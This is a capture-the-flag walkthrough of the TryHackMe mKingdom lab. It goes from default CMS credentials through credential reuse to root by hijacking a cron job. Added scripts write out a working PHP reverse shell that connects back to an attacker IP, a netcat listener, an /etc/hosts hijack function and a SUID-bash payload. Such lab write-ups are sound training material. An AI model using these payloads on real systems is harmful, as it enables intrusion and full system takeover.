mKingdom Writeup: TryHackMe

Beginner-friendly box inspired by a certain mustache man.


Box Summary

The mKingdom room is an easy-rated machine created by uartao. It revolves around finding a Concrete5 CMS instance, logging in as admin, getting a foothold as www-data with a web shell, then escalating to another user and finally to root.

Enumeration

As always, I started enumerating the box with nmap for open ports and found just one open port: 85.

Port 85 served a web app with a default banner. Fuzzing it with ffuf and common.txt turned up the /app endpoint, where a Concrete5 CMS instance is hosted.

From the footer we find the login link. Trying default credentials such as admin:admin and admin:password, we find that admin:password works and get in as admin.

From the Files endpoint (in the right navbox) we can upload files to the instance, but only images are allowed. This can be bypassed easily, or we can go to System & Settings > Allowed File Types and add the php extension to the list.

Go back to Files. I will be uploading a PHP reverse shell from here. Make sure you change the $ip and $port variables to your IP and listening port.

Upload the reverse shell using the upload file feature.

Start a netcat listener on the port you specified in the reverse shell:

nc -lvnp <port>

Use the file link to access it, which makes the server execute the uploaded PHP.

And we get a shell as www-data.
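As an added example (not the author's file or a Concrete5 feature), the following shell script generates a PHP reverse shell with the IP and port filled in and prints the matching listener command. The payload uses PHP's proc_open to hand the connected socket to /bin/sh; the IP, port and output name in the usage comment are placeholders you replace with your own.

```bash
#!/usr/bin/env bash
# Added example, not from the writeup: build the PHP reverse shell to upload
# through the Concrete5 Files page and print the matching netcat listener.

make_php_revshell() {
  # $1 attacker IP, $2 listening port, $3 output path (ends in .php, which is
  # why the php extension has to be allowed in the CMS first)
  local ip=$1 port=$2 out=$3
  # refuse anything that is not a dotted IPv4 / numeric port so nothing odd
  # ends up inside the generated PHP string literals
  case "$ip" in
    ""|*[!0-9.]*) echo "bad ip: $ip" >&2; return 1 ;;
  esac
  case "$port" in
    ""|*[!0-9]*) echo "bad port: $port" >&2; return 1 ;;
  esac
  [ "$port" -ge 1 ] && [ "$port" -le 65535 ] || { echo "port out of range: $port" >&2; return 1; }
  cat > "$out" <<EOF
<?php
// connect back to the listener and attach an interactive shell to the socket
\$ip = "$ip";
\$port = $port;
\$sock = fsockopen(\$ip, \$port);
if (!\$sock) { die("connect failed"); }
\$proc = proc_open("/bin/sh -i", array(0 => \$sock, 1 => \$sock, 2 => \$sock), \$pipes);
EOF
}

listener_cmd() {
  # the command to run on the attacker side before opening the file link
  printf 'nc -lvnp %s\n' "$1"
}

# usage (placeholder IP/port; use your VPN address and a free port):
#   make_php_revshell 10.10.14.5 4444 shell.php
#   listener_cmd 4444      # prints: nc -lvnp 4444
```

Upload the generated file through Files, start the listener the script printed, then open the file link; the request to the PHP file is what triggers the connect-back.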

Privilege Escalation (to Toad):

Now, as www-data, we need a way to escalate to the toad user. Checking the web directory, in /var/www/html/app/castle/application/config we find database.php, which contains the MySQL password for the toad user.

Instead of checking MySQL first (I checked it later; nothing useful there), try the password against the system account: it is reused by the toad user, and we get in as toad.

Privilege Escalation (to Mario):

I spent some time on this, although it turned out to be really easy. Checking the environment variables (env) we find a base64-encoded value in the PWD_token variable.

The solution was that the decoded PWD_token is the password for the mario user. It felt too guessy, and I was lucky to try it; this part could have been a lot better.

We get in as the mario user with the decoded password.
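Spotting PWD_token by eye works on a small env, but the same check can be automated. The shell functions below are an added example, not the author's: they read KEY=VALUE lines (what env prints), keep values that have the shape of base64, and print only those that decode to printable text, which filters out things like paths that happen to be valid base64. The token value in the test input is constructed and is not the box's real one.

```bash
#!/usr/bin/env bash
# Added example, not from the writeup: find base64-looking values in env-style
# KEY=VALUE input and show what they decode to.
export LC_ALL=C   # so the printable check is byte-based, not locale-dependent

looks_like_b64() {
  # base64 alphabet only, at least 8 chars, length a multiple of 4
  case "$1" in ""|*[!A-Za-z0-9+/=]*) return 1 ;; esac
  [ ${#1} -ge 8 ] && [ $(( ${#1} % 4 )) -eq 0 ]
}

decode_b64_values() {
  # reads KEY=VALUE lines on stdin, prints "KEY decoded-value" for each hit
  local line key val decoded
  while IFS= read -r line; do
    case "$line" in *=*) ;; *) continue ;; esac
    key=${line%%=*}        # split on the first '=' only; values may contain '='
    val=${line#*=}
    looks_like_b64 "$val" || continue
    decoded=$(printf '%s' "$val" | base64 -d 2>/dev/null) || continue
    # drop empty decodes and anything with non-printable bytes (binary noise
    # from values that are coincidentally valid base64, e.g. short paths)
    [ -n "$decoded" ] || continue
    case "$decoded" in *[![:print:]]*) continue ;; esac
    printf '%s %s\n' "$key" "$decoded"
  done
}

# usage on a live box:  env | decode_b64_values
```

The length check is deliberately loose; a real token without padding would be missed, so when the scan comes up empty it is still worth eyeballing env for anything that does not look like a normal setting.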

Privilege Escalation (to Root):

Checking sudo permissions with sudo -l, we find that we can run /usr/bin/id as root. We cannot spawn a shell or anything else with id, but interestingly the pwfeedback option is enabled in the sudo configuration. This seemed like the obvious thing to exploit to become root, but I could not exploit it.

I ran pspy64 to look for cron jobs run by root in the background, and found one:

Root is running a cron job that uses curl to download a counter.sh file from mkingdom.thm:85/ and then executes it, storing its output in a log.

The first thing I thought of: if we can write to /etc/hosts and point mkingdom.thm at our IP address, we control what counter.sh contains.

I checked, and /etc/hosts was indeed group-owned by mario's group with the group write bit set, which means we can write to it.

I edited the hosts file so that mkingdom.thm resolves to my IP address instead of 127.0.0.1.

Then I started a web server on port 85 with the directory structure of the curl request URL.

Counter.sh:

#!/bin/bash

cp /bin/bash /tmp/rootbash

# set suid bit
chmod +s /tmp/rootbash

Make sure you start the web server from the same directory as the counter.sh file, so that the path in the cron job's URL resolves to it.

After a few seconds I got a request from the box for counter.sh; the cron job executed it, and the rootbash binary appeared in /tmp.
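The hosts edit and the payload layout are easy to get subtly wrong (the writeup's own first attempt served counter.sh from the wrong directory), so here is the same procedure as an added shell example, not the author's commands. hijack_hosts rewrites the address on every non-comment line that names the host, or appends one, and writes the file back in place; stage_payload recreates the URL path under a web root and drops the counter.sh shown above. The URL path and IP in the usage comment are placeholders: use the path pspy showed in the curl command and your own VPN address.

```bash
#!/usr/bin/env bash
# Added example, not from the writeup: stage the cron-job hijack. Point the
# hostname the root cron job curls (mkingdom.thm) at our IP via /etc/hosts,
# then lay out the requested URL path under a web root with the SUID payload.

hijack_hosts() {
  # $1 hosts file, $2 hostname, $3 IP it should now resolve to
  local hosts=$1 name=$2 ip=$3 pat new
  pat=$(printf '%s' "$name" | sed 's/\./\\./g')    # literal dots in the regex
  if grep -qE "(^|[[:space:]])${pat}([[:space:]]|$)" "$hosts"; then
    # replace the address on every non-comment line that names the host
    new=$(sed -E "/(^|[[:space:]])${pat}([[:space:]]|$)/ s/^[^#[:space:]]+/${ip}/" "$hosts")
  else
    new=$(cat "$hosts"; printf '%s %s\n' "$ip" "$name")
  fi
  # write in place: truncating the existing file keeps its inode, owner and
  # the group-write bit. sed -i and editors that save via temp file + rename
  # need write access to /etc itself, which mario does not have.
  printf '%s\n' "$new" > "$hosts"
}

stage_payload() {
  # $1 web root to serve from, $2 URL path the cron job requests
  local root=$1 path=$2
  mkdir -p "${root}$(dirname "$path")"
  cat > "${root}${path}" <<'EOF'
#!/bin/bash
# executed by root's cron job: leave a setuid copy of bash behind
cp /bin/bash /tmp/rootbash
chmod +s /tmp/rootbash
EOF
  chmod +x "${root}${path}"
}

# usage, with placeholder IP and path:
#   on the box as mario:   hijack_hosts /etc/hosts mkingdom.thm 10.10.14.5
#   on the attacker side:  stage_payload ./www /example/counter.sh
#                          cd ./www && sudo python3 -m http.server 85
```

Port 85 is below 1024, so the local web server needs root (or the appropriate capability) on the attacking machine; if it fails to bind, the cron job's curl just errors and nothing lands in /tmp. Check with ls -l /tmp/rootbash after the next cron run before trying to use it.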

Get a root shell (the -p flag stops bash from dropping the setuid privileges when its effective UID differs from the real one):

/tmp/rootbash -p

Got a shell as root!